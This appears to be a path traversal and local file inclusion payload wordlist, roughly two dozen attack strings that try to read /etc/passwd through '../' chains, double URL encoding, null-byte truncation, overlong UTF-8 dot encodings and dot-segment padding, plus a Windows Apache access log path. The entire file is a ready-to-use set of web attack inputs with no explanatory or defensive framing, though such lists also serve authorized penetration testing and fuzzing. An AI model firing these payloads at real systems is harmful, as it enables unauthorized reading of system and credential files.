../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../etc/passwd%00
..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
%252e%252e%252e%252e%252fetc%252fpasswd
%252e%252e%252e%252e%252fetc%252fpasswd%00
....//....//....//....//....//etc/passwd
/etc/passwd
/usr/local/../../../etc/passwd
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd%00
%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
../../../etc/passwd................................................
../../../etc/passwd
..///////..///////..////..//////etc/passwd
/%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../%5C../etc/passwd
%C0AE%C0AE%C0AF%C0AE%C0AE%C0AFetc%C0AFpasswd
eslam3kl%3A+..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
utils/scripts/../../../../../etc/passwd
../../../../../../../etc/./passwd
/etc/./passwd
../../../../../../../../etc/passwd/.
/etc/passwd/.
eslam/../../../../../../../../../etc/passwd/./././././././././././.
/var/www/../../etc/passwd
C:\Program Files\Apache Group\Apache\logs\access_log